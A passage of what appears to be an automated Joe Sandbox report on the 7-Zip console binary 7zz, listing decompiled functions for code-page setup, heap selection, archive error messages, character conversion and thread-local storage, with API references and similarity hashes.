						_t213 = E00426145(_t316 - 0x20,  *(_t316 + 0xc));
						L7:
						_t313 = _t213;
						L72:
						E00407A18( *((intOrPtr*)(_t316 - 0x20)));
						_t158 = _t313;
						L73:
						 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
						return _t158;
					}
				}
				L1:
				_t313 = 0x80070057;
				goto L72;
			}

0x004256d3
0x004256de
0x004256e6
0x004256ee
0x004256f0
0x004256f3
0x004256fb
0x00425707
0x0042570a
0x0042570d
0x00425711
0x0042572a
0x0042572e
0x0042576b
0x00425770
0x00425772
0x004257a1
0x004257ab
0x004257b0
0x004257b2
0x004257b6
0x00425957
0x00425957
0x0042595e
0x0042596a
0x0042596d
0x00425970
0x0042597c
0x0042597f
0x00425982
0x00425985
0x004259c6
0x004259ce
0x004259d1
0x004259d4
0x004259d7
0x00425a18
0x00425a1d
0x00425a1f
0x00425a97
0x00425a9a
0x00425aa2
0x00425aa8
0x00000000
0x00425aad
0x00425a24
0x00425a28
0x00425a2c
0x00425a33
0x00425a35
0x00425a39
0x00425a3c
0x00425a3f
0x00425ab3
0x00425ab3
0x00425ab6
0x00425ab6
0x00425ab8
0x00425ab8
0x00425abb
0x00000000
0x00000000
0x00425abd
0x00425abf
0x00425abf
0x00425aca
0x00425ad5
0x00425ad8
0x00425ae4
0x00425ae6
0x00425aea
0x00425aef
0x00425af2
0x00425b1c
0x00425b24
0x00425b27
0x00425b2c
0x00425b2c
0x00425b2f
0x00425b35
0x00425b36
0x00425b3e
0x00425b42
0x00425b47
0x00425b47
0x00425b47
0x00425b49
0x00425b4c
0x00000000
0x00425b51
0x00425af7
0x00425afb
0x00425b00
0x00425b03
0x00425b0b
0x00425b11
0x00000000
0x00425b13
0x00425a41
0x00425a44
0x00000000
0x00000000
0x00425a46
0x00425a49
0x00000000
0x00000000
0x00425a4e
0x00425a53
0x00425a55
0x00425a8b
0x00425a8e
0x00425a92
0x00000000
0x00425a92
0x00425a5f
0x00425a62
0x00425a71
0x00425a72
0x00425a73
0x00425a7d
0x00425a7e
0x00425a83
0x00425a85
0x00000000
0x00000000
0x00000000
0x00425a85
0x004259d9
0x004259dc
0x004259e0
0x00000000
0x00000000
0x004259e8
0x004259f2
0x004259f3
0x004259f4
0x00425a00
0x00425a02
0x00425a07
0x00425a0a
0x00000000
0x00000000
0x00000000
0x00425a10
0x00425987
0x0042598a
0x0042598d
0x00425992
0x0042599c
0x004259a0
0x004259aa
0x004259ab
0x004259af
0x004259b7
0x004259bb
0x004259c0
0x004259c1
0x004259c1
0x00000000
0x0042598a
0x00425972
0x00425972
0x00000000
0x00425972
0x00425960
0x00000000
0x00425960
0x004257c5
0x004257d1
0x004257d5
0x004257dd
0x004257e2
0x004257e6
0x004257eb
0x004257ee
0x00425830
0x00425835
0x00425837
0x0042584c
0x00425851
0x00425853
0x00425868
0x0042586d
0x0042586f
0x00425884
0x00425889
0x0042588b
0x004258c3
0x004258c8
0x004258ca
0x004258f3
0x004258f8
0x004258fa
0x00425911
0x00425916
0x00425918
0x0042592a
0x0042592f
0x00425931
0x00425943
0x00425948
0x0042594a
0x00425954
0x00000000
0x00425954
0x0042594c
0x0042594f
0x00425902
0x00425902
0x004258db
0x004258db
0x00000000
0x004258db
0x00425933
0x00425936
0x00000000
0x00425936
0x0042591a
0x0042591d
0x00000000
0x0042591d
0x004258fc
0x004258ff
0x00000000
0x004258ff
0x004258d2
0x004258d7
0x004258d9
0x004258e2
0x00000000
0x004258e2
0x00000000
0x004258d9
0x00425893
0x00425897
0x0042589c
0x0042589e
0x004258a7
0x004258ab
0x004258b1
0x004258b1
0x004258a0
0x004258a0
0x004258a0
0x00000000
0x0042589e
0x00425871
0x00425874
0x00000000
0x00425874
0x00425855
0x00425858
0x00000000
0x00425858
0x00425839
0x0042583c
0x00000000
0x0042583c
0x004257f9
0x00425807
0x00425813
0x00425815
0x0042581a
0x0042581d
0x00000000
0x00000000
0x00000000
0x00425823
0x00425774
0x00425774
0x0042577d
0x00425783
0x00425788
0x00000000
0x00425788
0x00425736
0x0042573b
0x0042573e
0x00425754
0x00425757
0x00000000
0x00000000
0x0042575e
0x0042575f
0x00425740
0x00425740
0x00425745
0x00425745
0x00000000
0x00425713
0x00425719
0x0042571e
0x00425721
0x00425722
0x00425789
0x0042578f
0x0042574a
0x0042574a
0x00425b52
0x00425b55
0x00425b5b
0x00425b5d
0x00425b62
0x00425b6b
0x00425b6b
0x00425711
0x004256fd
0x004256fd
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004256D3

Part of subcall function 00407ED0: __EH_prolog.LIBCMT ref: 00407ED5

Strings

RSFX, xrefs: 0042582B
-B, xrefs: 00425992
CRC, xrefs: 00425766
HCF, xrefs: 0042587F

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: CRC$HCF$RSFX$-B
API String ID: 3519838083-950596765
Opcode ID: 81c17ac54e65c1df555e127d28f88444a92df1476759999909bb7db1c08ade0f
Instruction ID: 6c3dbe44b38eb95146665e90f90a400f3930304e0ccaa8816579fca9b7e0a093
Opcode Fuzzy Hash: 81c17ac54e65c1df555e127d28f88444a92df1476759999909bb7db1c08ade0f
Instruction Fuzzy Hash: 94E1C230A00529DBCF10EB95E8919EEB771EF44314FA0852FE44277291DB7CAA45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00471830 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00471830(int _a4) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				signed int _t40;
				signed int _t41;
				int _t43;
				signed int _t47;
				signed int _t49;
				int _t50;
				signed char* _t51;
				signed int _t55;
				signed char* _t57;
				signed int _t60;
				intOrPtr* _t63;
				signed int _t65;
				signed char _t66;
				signed char _t68;
				signed char _t69;
				signed int _t70;
				void* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				void* _t85;

				E0046E56A(0x19);
				_t50 = E004719DD(_a4);
				_t85 = _t50 -  *0x496228; // 0x4e4
				_a4 = _t50;
				if(_t85 != 0) {
					__eflags = _t50;
					if(_t50 == 0) {
						L30:
						E00471A5A();
					} else {
						_t65 = 0;
						__eflags = 0;
						_t36 = 0x490638;
						while(1) {
							__eflags =  *_t36 - _t50;
							if( *_t36 == _t50) {
								break;
							}
							_t36 = _t36 + 0x30;
							_t65 = _t65 + 1;
							__eflags = _t36 - 0x490728;
							if(_t36 < 0x490728) {
								continue;
							} else {
								_t43 = GetCPInfo(_t50,  &_v28);
								_t81 = 1;
								__eflags = _t43 - _t81;
								if(_t43 != _t81) {
									__eflags =  *0x49384c;
									if( *0x49384c == 0) {
										_t77 = _t81 | 0xffffffff;
										__eflags = _t77;
									} else {
										goto L30;
									}
								} else {
									 *0x496444 =  *0x496444 & 0x00000000;
									_t60 = 0x40;
									__eflags = _v28 - _t81;
									memset(0x496340, 0, _t60 << 2);
									asm("stosb");
									 *0x496228 = _t50;
									if(__eflags <= 0) {
										 *0x49623c =  *0x49623c & 0x00000000;
										__eflags =  *0x49623c;
									} else {
										__eflags = _v22;
										if(_v22 != 0) {
											_t63 =  &_v21;
											while(1) {
												_t69 =  *_t63;
												__eflags = _t69;
												if(_t69 == 0) {
													goto L24;
												}
												_t49 =  *(_t63 - 1) & 0x000000ff;
												_t70 = _t69 & 0x000000ff;
												while(1) {
													__eflags = _t49 - _t70;
													if(_t49 > _t70) {
														break;
													}
													 *(_t49 + 0x496341) =  *(_t49 + 0x496341) | 0x00000004;
													_t49 = _t49 + 1;
												}
												_t63 = _t63 + 2;
												__eflags =  *(_t63 - 1);
												if( *(_t63 - 1) != 0) {
													continue;
												}
												goto L24;
											}
										}
										L24:
										_t47 = _t81;
										do {
											 *(_t47 + 0x496341) =  *(_t47 + 0x496341) | 0x00000008;
											_t47 = _t47 + 1;
											__eflags = _t47 - 0xff;
										} while (_t47 < 0xff);
										 *0x496444 = E00471A27(_t50);
										 *0x49623c = _t81;
									}
									_t71 = 0x496230;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L31:
									E00471A83(_t50, _t71);
									goto L1;
								}
							}
							goto L33;
						}
						_v8 = _v8 & 0x00000000;
						_t55 = 0x40;
						memset(0x496340, 0, _t55 << 2);
						_t79 = _t65 + _t65 * 2 << 4;
						__eflags = _t79;
						asm("stosb");
						_t51 = _t79 + 0x490648;
						do {
							__eflags =  *_t51;
							_t57 = _t51;
							if( *_t51 != 0) {
								while(1) {
									_t66 = _t57[1];
									__eflags = _t66;
									if(_t66 == 0) {
										goto L21;
									}
									_t41 =  *_t57 & 0x000000ff;
									_t74 = _t66 & 0x000000ff;
									__eflags = _t41 - _t74;
									if(_t41 <= _t74) {
										_t19 = _v8 + 0x490630; // 0x8040201
										_t68 =  *_t19;
										do {
											 *(_t41 + 0x496341) =  *(_t41 + 0x496341) | _t68;
											_t41 = _t41 + 1;
											__eflags = _t41 - _t74;
										} while (_t41 <= _t74);
									}
									_t57 =  &(_t57[2]);
									__eflags =  *_t57;
									if( *_t57 != 0) {
										continue;
									}
									goto L21;
								}
							}
							L21:
							_v8 = _v8 + 1;
							_t51 =  &(_t51[8]);
							__eflags = _v8 - 4;
						} while (_v8 < 4);
						_t39 = _a4;
						 *0x49623c = 1;
						 *0x496228 = _a4;
						_t40 = E00471A27(_t39);
						_t71 = 0x496230;
						asm("movsd");
						asm("movsd");
						 *0x496444 = _t40;
						asm("movsd");
					}
					goto L31;
				} else {
					L1:
					_t77 = 0;
				}
				L33:
				E0046E5CB(0x19);
				return _t77;
			}

0x0047183b
0x00471848
0x0047184b
0x00471852
0x00471855
0x0047185e
0x00471860
0x004719bc
0x004719bc
0x00471866
0x00471866
0x00471866
0x00471868
0x0047186d
0x0047186d
0x0047186f
0x00000000
0x00000000
0x00471871
0x00471874
0x00471875
0x0047187a
0x00000000
0x0047187c
0x00471881
0x00471889
0x0047188a
0x0047188c
0x004719b3
0x004719ba
0x004719cb
0x004719cb
0x00000000
0x00000000
0x00000000
0x00471892
0x00471894
0x0047189b
0x004718a3
0x004718a6
0x004718a8
0x004718a9
0x004718af
0x004719a0
0x004719a0
0x004718b5
0x004718b5
0x004718b9
0x004718bf
0x004718c2
0x004718c2
0x004718c4
0x004718c6
0x00000000
0x00000000
0x004718cc
0x004718d0
0x004718d3
0x004718d3
0x004718d5
0x00000000
0x00000000
0x004718db
0x004718e2
0x004718e2
0x00471970
0x00471971
0x00471975
0x00000000
0x00000000
0x00000000
0x00471975
0x004718c2
0x0047197b
0x0047197b
0x0047197d
0x0047197d
0x00471984
0x00471985
0x00471985
0x00471993
0x00471998
0x00471998
0x004719a9
0x004719ae
0x004719af
0x004719b0
0x004719c1
0x004719c1
0x00000000
0x004719c1
0x0047188c
0x00000000
0x0047187a
0x004718e5
0x004718eb
0x004718f6
0x004718f8
0x004718f8
0x004718fb
0x004718fc
0x00471902
0x00471902
0x00471905
0x00471907
0x00471909
0x00471909
0x0047190c
0x0047190e
0x00000000
0x00000000
0x00471910
0x00471913
0x00471916
0x00471918
0x0047191d
0x0047191d
0x00471923
0x00471923
0x00471929
0x0047192a
0x0047192a
0x00471923
0x0047192f
0x00471930
0x00471933
0x00000000
0x00000000
0x00000000
0x00471933
0x00471909
0x00471935
0x00471935
0x00471938
0x0047193b
0x0047193b
0x00471941
0x00471944
0x0047194f
0x00471954
0x0047195f
0x00471964
0x00471965
0x00471967
0x0047196c
0x0047196c
0x00000000
0x00471857
0x00471857
0x00471857
0x00471857
0x004719ce
0x004719d0
0x004719dc

APIs

Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2

GetCPInfo.KERNEL32(00000000,?,?,?,00000000,?,?,0046CFEB), ref: 00471881

Part of subcall function 0046E5CB: LeaveCriticalSection.KERNEL32(?,0046C0D0,00000009,0046C0BC,00000000,?,00000000,00000000,00000000), ref: 0046E5D8

Strings

@cI, xrefs: 0047189E
@cI, xrefs: 004718EE
0bI, xrefs: 004719A9
0bI, xrefs: 0047195F

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalSection$EnterInfoInitializeLeave
String ID: 0bI$0bI$@cI$@cI
API String ID: 1866836854-605000347
Opcode ID: fb2e5454b5c0239ef892e6083fb739233ab4ecf906b078c2986846cff91fd72d
Instruction ID: f7c0c694ad5e617c113d7fbc1e97f9e30d3079020f4ba9ff39ded3c73c8e616e
Opcode Fuzzy Hash: fb2e5454b5c0239ef892e6083fb739233ab4ecf906b078c2986846cff91fd72d
Instruction Fuzzy Hash: 33415CF16042409EEB21DBBDD8917EA7BE09B05314F25C07BD68D862B2C33D494AC74E

Uniqueness

Uniqueness Score: -1.00%

Function 0046E91E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0046E91E(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E0046CC80(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E0046E8F1( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00471260("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E004711E0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00471120(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E00470EE6(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}

0x0046e926
0x0046e933
0x0046e945
0x0046e95b
0x00000000
0x0046e95b
0x0046e97a
0x0046ea50
0x0046ea54
0x0046ea5e
0x00000000
0x0046ea60
0x0046e982
0x0046e98e
0x0046e990
0x0046e990
0x0046e994
0x0046e99c
0x0046e99c
0x0046e99e
0x0046e99f
0x0046e990
0x0046e9bb
0x0046e9d2
0x0046e9de
0x0046e9e4
0x0046e9e6
0x0046e9e6
0x0046e9ea
0x0046e9f2
0x0046e9f2
0x0046e9f4
0x0046e9f5
0x0046e9e6
0x0046ea07
0x0046e9bd
0x0046e9bd
0x0046e9bd
0x0046ea10
0x00000000
0x00000000
0x0046ea15
0x0046ea1e
0x00000000
0x00000000
0x0046ea20
0x0046ea21
0x0046ea25
0x0046ea27
0x0046ea2a
0x0046ea30
0x0046ea2c
0x0046ea2c
0x0046ea2c
0x0046ea31
0x0046ea27
0x0046ea39
0x0046ea44
0x00000000
0x00000000
0x0046ea65

APIs

GetVersionExA.KERNEL32 ref: 0046E93D
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0046E972
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0046E9D2

Strings

__GLOBAL_HEAP_SELECTED, xrefs: 0046E9AC
__MSVCRT_HEAP_SELECT, xrefs: 0046E96D

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: d2698aefaa4a4e50ff42bfeab236f56def5fb5be9e683bef9c987278d28df3f8
Instruction ID: 26b517cc7216be0e7fa39fd26568a30cb45b6abf2afbf55f3da7e0b56cbc24c7
Opcode Fuzzy Hash: d2698aefaa4a4e50ff42bfeab236f56def5fb5be9e683bef9c987278d28df3f8
Instruction Fuzzy Hash: 54312CB99052446DEB3186B65C857EF37E8AF06304F1404DBE189D5142F5388ECEC71B

Uniqueness

Uniqueness Score: -1.00%

Function 00401BE5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401BE5(void* __ecx) {
				intOrPtr* _t22;
				char* _t27;
				intOrPtr _t29;
				char* _t42;
				void* _t45;
				void* _t47;

				E0046B890(E00472D20, _t47);
				_t45 = __ecx;
				_t42 = E00407CCD;
				E00407CC0( *((intOrPtr*)(__ecx + 0x40)), E00407CCD);
				_t29 =  *((intOrPtr*)(_t47 + 0xc));
				if(_t29 != 0) {
					E00407CD5( *((intOrPtr*)(__ecx + 0x40)), "Error: ");
					if(_t29 != 1) {
						if(_t29 != 0x8007000e) {
							_t22 = E00401C91(_t47 - 0x18, _t29);
							 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
							E00407CD5( *((intOrPtr*)(__ecx + 0x40)),  *_t22);
							 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
							E00407A18( *((intOrPtr*)(_t47 - 0x18)));
						} else {
							_push("Can\'t allocate required memory");
							goto L5;
						}
					} else {
						_t27 = "Can not open encrypted archive. Wrong password?";
						if( *((char*)(_t47 + 0x10)) == 0) {
							_t27 = "Can not open file as archive";
						}
						_push(_t27);
						L5:
						E00407CD5( *((intOrPtr*)(_t45 + 0x40)));
					}
					E00407CC0( *((intOrPtr*)(_t45 + 0x40)), _t42);
					 *((intOrPtr*)(_t45 + 0x28)) =  *((intOrPtr*)(_t45 + 0x28)) + 1;
					asm("adc dword [esi+0x2c], 0x0");
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return 0;
			}

0x00401bea
0x00401bf5
0x00401bf7
0x00401c00
0x00401c05
0x00401c0a
0x00401c14
0x00401c1c
0x00401c3f
0x00401c4d
0x00401c57
0x00401c5b
0x00401c63
0x00401c67
0x00401c41
0x00401c41
0x00000000
0x00401c41
0x00401c1e
0x00401c22
0x00401c27
0x00401c29
0x00401c29
0x00401c2e
0x00401c2f
0x00401c32
0x00401c32
0x00401c71
0x00401c76
0x00401c7a
0x00401c7a
0x00401c86
0x00401c8e

APIs

__EH_prolog.LIBCMT ref: 00401BEA

Strings

Can not open encrypted archive. Wrong password?, xrefs: 00401C22, 00401C2E
Error: , xrefs: 00401C0F
Can not open file as archive, xrefs: 00401C29
Can't allocate required memory, xrefs: 00401C41

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: Can not open encrypted archive. Wrong password?$Can not open file as archive$Can't allocate required memory$Error:
API String ID: 3519838083-4253456528
Opcode ID: f643b0d77a5193f8bda12cef83a72c641e5637254c1606468349ebd7a63f7bd3
Instruction ID: e96b05d5f5363979fc09c6e311170d97ed88631a387b5d6dedbde536d9aec6cb
Opcode Fuzzy Hash: f643b0d77a5193f8bda12cef83a72c641e5637254c1606468349ebd7a63f7bd3
Instruction Fuzzy Hash: 3D11C431A082049BEB24FA65D485A6F77B4AB44728F10493FE142676D1C7BDA8509B1A

Uniqueness

Uniqueness Score: -1.00%

Function 00407E4F Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00407E4F(signed int __ecx) {
				short _v6;
				char _v12;
				short _t12;
				short _t27;
				int _t29;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_v6 = __ecx;
				if(__ecx != 0) {
					_t27 = CharUpperW(__ecx & 0x0000ffff);
					if(_t27 != 0 || GetLastError() != 0x78) {
						_t12 = _t27;
					} else {
						_t29 = WideCharToMultiByte(0, 0,  &_v6, 1,  &_v12, 4, 0, 0);
						if(_t29 != 0 && _t29 <= 4) {
							 *((char*)(_t30 + _t29 - 8)) = 0;
							CharUpperA( &_v12);
							MultiByteToWideChar(0, 0,  &_v12, _t29,  &_v6, 1);
						}
						_t12 = _v6;
					}
				} else {
					_t12 = 0;
				}
				return _t12;
			}

0x00407e52
0x00407e53
0x00407e5b
0x00407e5f
0x00407e70
0x00407e74
0x00407ec9
0x00407e81
0x00407e97
0x00407e9b
0x00407ea5
0x00407eaa
0x00407ebd
0x00407ebd
0x00407ec3
0x00407ec3
0x00407e61
0x00407e61
0x00407e61
0x00407ecf

APIs

CharUpperW.USER32(00000000,?,?,?,?,?,0040809A), ref: 00407E6A
GetLastError.KERNEL32(?,0040809A), ref: 00407E76
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,0040809A), ref: 00407E91
CharUpperA.USER32(?,?,0040809A), ref: 00407EAA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,0040809A), ref: 00407EBD

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Char$ByteMultiUpperWide$ErrorLast
String ID:
API String ID: 3939315453-0
Opcode ID: 9762d04c8e9e661b91cd56bf749c6c8e842a9224ca4ce2e65b285a4f477558d7
Instruction ID: 5edd47f3eee096750295ea2d7ce811fd7bd140e04162cfca88e55b55a84ff537
Opcode Fuzzy Hash: 9762d04c8e9e661b91cd56bf749c6c8e842a9224ca4ce2e65b285a4f477558d7
Instruction Fuzzy Hash: BD0196BA8141197ADB106BA0DCC9DEF7A6CEB05315F0009B2F502F3251E2796D8587BA

Uniqueness

Uniqueness Score: -1.00%

Function 0046E383 Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046E383() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x48e060);
				if(_t16 == 0) {
					_t16 = L0046FE93(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x48e060, _t16) == 0) {
						E0046D03C(0x10);
					} else {
						E0046E370(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x0046e391
0x0046e399
0x0046e39d
0x0046e3a8
0x0046e3ae
0x0046e3d8
0x0046e3c1
0x0046e3c2
0x0046e3c8
0x0046e3ce
0x0046e3d2
0x0046e3d2
0x0046e3ae
0x0046e3df
0x0046e3e9

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,0047064B,004710B4,00000000,?,?,00000000,00000001), ref: 0046E385
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0046E393
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046E3DF

Part of subcall function 0046FE93: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046FF89

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046E3B7
GetCurrentThreadId.KERNEL32 ref: 0046E3C8

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
